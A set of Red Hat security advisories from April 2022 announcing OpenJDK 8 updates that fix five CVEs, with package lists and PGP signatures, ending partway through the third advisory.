Red Hat Security Advisory 2022-1487-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

`-----BEGIN PGP SIGNED MESSAGE-----   Hash: SHA256  =====================================================================   Red Hat Security Advisory  Synopsis: Important: java-1.8.0-openjdk security, bug fix, and enhancement update   Advisory ID: RHSA-2022:1487-01   Product: Red Hat Enterprise Linux   Advisory URL: https://access.redhat.com/errata/RHSA-2022:1487   Issue date: 2022-04-25   CVE Names: CVE-2022-21426 CVE-2022-21434 CVE-2022-21443   CVE-2022-21476 CVE-2022-21496   =====================================================================  1. Summary:  An update for java-1.8.0-openjdk is now available for Red Hat Enterprise   Linux 7.  Red Hat Product Security has rated this update as having a security impact   of Important. A Common Vulnerability Scoring System (CVSS) base score,   which gives a detailed severity rating, is available for each vulnerability   from the CVE link(s) in the References section.  2. Relevant releases/architectures:  Red Hat Enterprise Linux Client (v. 7) - x86_64   Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64   Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64   Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64   Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64   Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64   Red Hat Enterprise Linux Workstation (v. 7) - x86_64   Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64  3. Description:  The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime   Environment and the OpenJDK 8 Java Software Development Kit.  Security Fix(es):  * OpenJDK: Defective secure validation in Apache Santuario (Libraries,   8278008) (CVE-2022-21476)  * OpenJDK: Unbounded memory allocation when compiling crafted XPath   expressions (JAXP, 8270504) (CVE-2022-21426)  * OpenJDK: Improper object-to-string conversion in   AnnotationInvocationHandler (Libraries, 8277672) (CVE-2022-21434)  * OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)   (CVE-2022-21443)  * OpenJDK: URI parsing inconsistencies (JNDI, 8278972) (CVE-2022-21496)  For more details about the security issue(s), including the impact, a CVSS   score, acknowledgments, and other related information, refer to the CVE   page(s) listed in the References section.  4. Solution:  For details on how to apply this update, which includes the changes   described in this advisory, refer to:  https://access.redhat.com/articles/11258  All running instances of OpenJDK Java must be restarted for this update to   take effect.  5. Bugs fixed (https://bugzilla.redhat.com/):  2047529 - Prepare for the next quarterly OpenJDK upstream release (2022-04, 8u332) [rhel-7]   2075788 - CVE-2022-21426 OpenJDK: Unbounded memory allocation when compiling crafted XPath expressions (JAXP, 8270504)   2075793 - CVE-2022-21443 OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)   2075836 - CVE-2022-21434 OpenJDK: Improper object-to-string conversion in AnnotationInvocationHandler (Libraries, 8277672)   2075842 - CVE-2022-21476 OpenJDK: Defective secure validation in Apache Santuario (Libraries, 8278008)   2075849 - CVE-2022-21496 OpenJDK: URI parsing inconsistencies (JNDI, 8278972)  6. Package List:  Red Hat Enterprise Linux Client (v. 7):  Source:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.src.rpm  x86_64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.x86_64.rpm  Red Hat Enterprise Linux Client Optional (v. 7):  noarch:   java-1.8.0-openjdk-javadoc-1.8.0.332.b09-1.el7_9.noarch.rpm   java-1.8.0-openjdk-javadoc-zip-1.8.0.332.b09-1.el7_9.noarch.rpm  x86_64:   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.x86_64.rpm  Red Hat Enterprise Linux ComputeNode (v. 7):  Source:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.src.rpm  x86_64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.x86_64.rpm  Red Hat Enterprise Linux ComputeNode Optional (v. 7):  noarch:   java-1.8.0-openjdk-javadoc-1.8.0.332.b09-1.el7_9.noarch.rpm   java-1.8.0-openjdk-javadoc-zip-1.8.0.332.b09-1.el7_9.noarch.rpm  x86_64:   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.x86_64.rpm  Red Hat Enterprise Linux Server (v. 7):  Source:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.src.rpm  ppc64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.ppc64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.ppc64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.ppc64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.ppc64.rpm  ppc64le:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.ppc64le.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.ppc64le.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.ppc64le.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.ppc64le.rpm  s390x:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.s390x.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.s390x.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.s390x.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.s390x.rpm  x86_64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.x86_64.rpm  Red Hat Enterprise Linux Server Optional (v. 7):  noarch:   java-1.8.0-openjdk-javadoc-1.8.0.332.b09-1.el7_9.noarch.rpm   java-1.8.0-openjdk-javadoc-zip-1.8.0.332.b09-1.el7_9.noarch.rpm  ppc64:   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.ppc64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.ppc64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.ppc64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.ppc64.rpm  ppc64le:   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.ppc64le.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.ppc64le.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.ppc64le.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.ppc64le.rpm  s390x:   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.s390x.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.s390x.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.s390x.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.s390x.rpm  x86_64:   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.x86_64.rpm  Red Hat Enterprise Linux Workstation (v. 7):  Source:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.src.rpm  x86_64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el7_9.x86_64.rpm  Red Hat Enterprise Linux Workstation Optional (v. 7):  noarch:   java-1.8.0-openjdk-javadoc-1.8.0.332.b09-1.el7_9.noarch.rpm   java-1.8.0-openjdk-javadoc-zip-1.8.0.332.b09-1.el7_9.noarch.rpm  x86_64:   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el7_9.x86_64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.i686.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el7_9.x86_64.rpm  These packages are GPG signed by Red Hat for security. Our key and   details on how to verify the signature are available from   https://access.redhat.com/security/team/key/  7. References:  https://access.redhat.com/security/cve/CVE-2022-21426   https://access.redhat.com/security/cve/CVE-2022-21434   https://access.redhat.com/security/cve/CVE-2022-21443   https://access.redhat.com/security/cve/CVE-2022-21476   https://access.redhat.com/security/cve/CVE-2022-21496   https://access.redhat.com/security/updates/classification/#important  8. Contact:  The Red Hat security contact is <secalert@redhat.com>. More contact   details at https://access.redhat.com/security/team/contact/  Copyright 2022 Red Hat, Inc.   -----BEGIN PGP SIGNATURE-----   Version: GnuPG v1  iQIVAwUBYmbJhNzjgjWX9erEAQhPuw//Zb0N99JyndrQMfmjrUw7kGh4hagh5/6v   EmZbNfmYZ3WtF7kOdNWzJ1bVnND5FsUZD1gHKz12ico5O+L+3yfkvqbPZe6F8DtE   XM391+BBLRe5A27rArHPpx1gM76N01BO7SBdawDXR7ZOHw0qF8nWa7AGzmzbNAYx   mn6RXFVvmlCLGDI83/aRY5wi7WPssQ0FAj4HB5ngeYLMEzzlQ63bQM6zoysW5aD9   K/Y0b1b/zpdawLaHJSCMLGPjNd5rRgBmQtNK94OVITMcgbYBEvQU9buDq9NoGrbK   Qp+MXaweMYtFJoDVP3PqiiZdu20nagfH8sfnBpw6LXqh2yWjvrSPJpniNm0jRPLk   YBReD1bLSk8JpQkTKjdSq8S6hQlNqzTHukNFTi4O7wkI031h2G/EV9kGf3nF7/uX   hGiwl2WAgwfM1CnFm9keiVZYj5aGHsLaxHqe0At8SU0c60UqAqJ4Ms924XKAkxrK   5+qAErYzOENysGss43zcwW2ru585gJzQmXUwLZmQ4AKeNp19xSwBro4RFJfKtZgv   N6rukoMIr3X9AE++k7iNTYh3c5wWoExU3yri8TYaap8sCk+Uys0kLHhMTW7eXH9X   U81tTAy5JVvLLmlijIe4/exnpdBXcJTeruKpNX7NT6BR/kQtApDORJcLoOK5Eowg   kmZ0zK+vqwM=   =TsnX   -----END PGP SIGNATURE-----   --   RHSA-announce mailing list   RHSA-announce@redhat.com   https://listman.redhat.com/mailman/listinfo/rhsa-announce  `

Red Hat Security Advisory 2022-1487-01

Red Hat Security Advisory 2022-1488-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

`-----BEGIN PGP SIGNED MESSAGE-----   Hash: SHA256  =====================================================================   Red Hat Security Advisory  Synopsis: Important: java-1.8.0-openjdk security update   Advisory ID: RHSA-2022:1488-01   Product: Red Hat Enterprise Linux   Advisory URL: https://access.redhat.com/errata/RHSA-2022:1488   Issue date: 2022-04-25   CVE Names: CVE-2022-21426 CVE-2022-21434 CVE-2022-21443   CVE-2022-21476 CVE-2022-21496   =====================================================================  1. Summary:  An update for java-1.8.0-openjdk is now available for Red Hat Enterprise   Linux 8.1 Update Services for SAP Solutions.  Red Hat Product Security has rated this update as having a security impact   of Important. A Common Vulnerability Scoring System (CVSS) base score,   which gives a detailed severity rating, is available for each vulnerability   from the CVE link(s) in the References section.  2. Relevant releases/architectures:  Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64  3. Description:  The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime   Environment and the OpenJDK 8 Java Software Development Kit.  Security Fix(es):  * OpenJDK: Defective secure validation in Apache Santuario (Libraries,   8278008) (CVE-2022-21476)  * OpenJDK: Unbounded memory allocation when compiling crafted XPath   expressions (JAXP, 8270504) (CVE-2022-21426)  * OpenJDK: Improper object-to-string conversion in   AnnotationInvocationHandler (Libraries, 8277672) (CVE-2022-21434)  * OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)   (CVE-2022-21443)  * OpenJDK: URI parsing inconsistencies (JNDI, 8278972) (CVE-2022-21496)  For more details about the security issue(s), including the impact, a CVSS   score, acknowledgments, and other related information, refer to the CVE   page(s) listed in the References section.  4. Solution:  For details on how to apply this update, which includes the changes   described in this advisory, refer to:  https://access.redhat.com/articles/11258  All running instances of OpenJDK Java must be restarted for this update to   take effect.  5. Bugs fixed (https://bugzilla.redhat.com/):  2075788 - CVE-2022-21426 OpenJDK: Unbounded memory allocation when compiling crafted XPath expressions (JAXP, 8270504)   2075793 - CVE-2022-21443 OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)   2075836 - CVE-2022-21434 OpenJDK: Improper object-to-string conversion in AnnotationInvocationHandler (Libraries, 8277672)   2075842 - CVE-2022-21476 OpenJDK: Defective secure validation in Apache Santuario (Libraries, 8278008)   2075849 - CVE-2022-21496 OpenJDK: URI parsing inconsistencies (JNDI, 8278972)  6. Package List:  Red Hat Enterprise Linux AppStream E4S (v. 8.1):  Source:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_1.src.rpm  aarch64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.aarch64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_1.aarch64.rpm  noarch:   java-1.8.0-openjdk-javadoc-1.8.0.332.b09-1.el8_1.noarch.rpm   java-1.8.0-openjdk-javadoc-zip-1.8.0.332.b09-1.el8_1.noarch.rpm  ppc64le:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.ppc64le.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_1.ppc64le.rpm  s390x:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_1.s390x.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_1.s390x.rpm  x86_64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el8_1.x86_64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_1.x86_64.rpm  These packages are GPG signed by Red Hat for security. Our key and   details on how to verify the signature are available from   https://access.redhat.com/security/team/key/  7. References:  https://access.redhat.com/security/cve/CVE-2022-21426   https://access.redhat.com/security/cve/CVE-2022-21434   https://access.redhat.com/security/cve/CVE-2022-21443   https://access.redhat.com/security/cve/CVE-2022-21476   https://access.redhat.com/security/cve/CVE-2022-21496   https://access.redhat.com/security/updates/classification/#important  8. Contact:  The Red Hat security contact is <secalert@redhat.com>. More contact   details at https://access.redhat.com/security/team/contact/  Copyright 2022 Red Hat, Inc.   -----BEGIN PGP SIGNATURE-----   Version: GnuPG v1  iQIVAwUBYmbJfNzjgjWX9erEAQgiKxAAoi0SREMKqTnKqWglR369v/Ni6B3d7xxj   glSaMGBkgf+2xZkI4eXqAr1EjpzNtTxWAvP6ORU+G03K38lhjKW77cJVCWntN83m   QpQ2pE936Lgcq03dJYX8KcVWutFS3WKeLXFdwlVGFxTvMMa+3BTYDMMrQWgahjet   jZAb1xqEYFJJ/MQ8hAIaZeHR5aM+G+BMhGFbNsHD+HVeLFl8vfgzJGNPQ2C9HJS8   9iZiaKRKEF4otzu+qYG7FPuZYqjE41xEzlQvmDcADBuD+CJUq9s1uf4dBKwhoAdc   E3GYmziH/WIMOKs1q/vyT8otnGZLd8V2PJTJYgMl33y/GWbMycFP5+VUaN5ag+je   36iBwmWsoVtDUz2UYrZJn28mUPGBEeaaFJ7+YFYpoo1hS3xwoNm6l8qB+LYJT8sk   v2Wh0IZolzQHEYhFYSapbpFciVOUaZZ7xfZ9k7MUJilT6oLj25kgrE/YLBF1xG12   KqQxiFDJ/r1Lh0P1ZaBc30gdsGMmQZ6sxJD0AJsLTq+zd6WJA9/bna4d/e5nsNPw   kGmazfEukC3vOUVV2wQ1QqihHUhx6ZJNyZb/KdO6oj5RWSu1t/wVuovqDZyeMNMs   /w7rQiTGU9q2HgggRq0EpuoN344t/dP94IJKESffvZDdSYLmaeVsIXHJ8RzYHS9M   tpSd0s3muU8=   =bWrm   -----END PGP SIGNATURE-----   --   RHSA-announce mailing list   RHSA-announce@redhat.com   https://listman.redhat.com/mailman/listinfo/rhsa-announce  `

Red Hat Security Advisory 2022-1488-01

Red Hat Security Advisory 2022-1489-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

`-----BEGIN PGP SIGNED MESSAGE-----   Hash: SHA256  =====================================================================   Red Hat Security Advisory  Synopsis: Important: java-1.8.0-openjdk security update   Advisory ID: RHSA-2022:1489-01   Product: Red Hat Enterprise Linux   Advisory URL: https://access.redhat.com/errata/RHSA-2022:1489   Issue date: 2022-04-25   CVE Names: CVE-2022-21426 CVE-2022-21434 CVE-2022-21443   CVE-2022-21476 CVE-2022-21496   =====================================================================  1. Summary:  An update for java-1.8.0-openjdk is now available for Red Hat Enterprise   Linux 8.2 Extended Update Support.  Red Hat Product Security has rated this update as having a security impact   of Important. A Common Vulnerability Scoring System (CVSS) base score,   which gives a detailed severity rating, is available for each vulnerability   from the CVE link(s) in the References section.  2. Relevant releases/architectures:  Red Hat Enterprise Linux AppStream EUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  3. Description:  The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime   Environment and the OpenJDK 8 Java Software Development Kit.  Security Fix(es):  * OpenJDK: Defective secure validation in Apache Santuario (Libraries,   8278008) (CVE-2022-21476)  * OpenJDK: Unbounded memory allocation when compiling crafted XPath   expressions (JAXP, 8270504) (CVE-2022-21426)  * OpenJDK: Improper object-to-string conversion in   AnnotationInvocationHandler (Libraries, 8277672) (CVE-2022-21434)  * OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)   (CVE-2022-21443)  * OpenJDK: URI parsing inconsistencies (JNDI, 8278972) (CVE-2022-21496)  For more details about the security issue(s), including the impact, a CVSS   score, acknowledgments, and other related information, refer to the CVE   page(s) listed in the References section.  4. Solution:  For details on how to apply this update, which includes the changes   described in this advisory, refer to:  https://access.redhat.com/articles/11258  All running instances of OpenJDK Java must be restarted for this update to   take effect.  5. Bugs fixed (https://bugzilla.redhat.com/):  2075788 - CVE-2022-21426 OpenJDK: Unbounded memory allocation when compiling crafted XPath expressions (JAXP, 8270504)   2075793 - CVE-2022-21443 OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)   2075836 - CVE-2022-21434 OpenJDK: Improper object-to-string conversion in AnnotationInvocationHandler (Libraries, 8277672)   2075842 - CVE-2022-21476 OpenJDK: Defective secure validation in Apache Santuario (Libraries, 8278008)   2075849 - CVE-2022-21496 OpenJDK: URI parsing inconsistencies (JNDI, 8278972)  6. Package List:  Red Hat Enterprise Linux AppStream EUS (v. 8.2):  Source:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_2.src.rpm  aarch64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.aarch64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_2.aarch64.rpm  noarch:   java-1.8.0-openjdk-javadoc-1.8.0.332.b09-1.el8_2.noarch.rpm   java-1.8.0-openjdk-javadoc-zip-1.8.0.332.b09-1.el8_2.noarch.rpm  ppc64le:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   